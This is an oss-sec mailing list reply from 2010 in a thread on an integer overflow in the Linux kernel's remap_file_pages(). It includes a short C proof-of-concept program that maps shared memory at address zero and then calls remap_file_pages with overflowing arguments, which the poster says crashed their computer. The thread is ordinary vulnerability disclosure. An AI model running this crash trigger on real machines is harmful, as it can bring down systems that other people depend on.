oss-sec mailing list archives
Re: kernel: avoid pgoff overflow in remap_file_pages
From: akiphie <akiphie () lavabit com>
Date: Tue, 12 Oct 2010 13:27:39 -0500
On Tuesday 12 October 2010 09:19:29 Eugene Teo wrote:
Thomas Pollet reported an integer overflow issue in remap_file_pages(). While we are able to reproduce the issue, we are unable to find a security impact. If your views differ, do let us know.
This made my computer very sad :( #include <sys/mman.h> #include <unistd.h> #include <sys/ipc.h> #include <sys/shm.h> int main(int argc, char **argv) { int x = shmget(IPC_PRIVATE, 1, IPC_CREAT | IPC_EXCL | 0600); void *mem = shmat(x, NULL, 0); mremap(mem, 0x1000, 0x1000, MREMAP_MAYMOVE | MREMAP_FIXED, 0x0); remap_file_pages((void *) 0xfff, ~0UL, 0, -(~0UL >> 12), 0); return 0; } -- cnu
Current thread:
- kernel: avoid pgoff overflow in remap_file_pages Eugene Teo (Oct 12)
- Re: kernel: avoid pgoff overflow in remap_file_pages Thomas Pollet (Oct 12)
- Re: kernel: avoid pgoff overflow in remap_file_pages akiphie (Oct 12)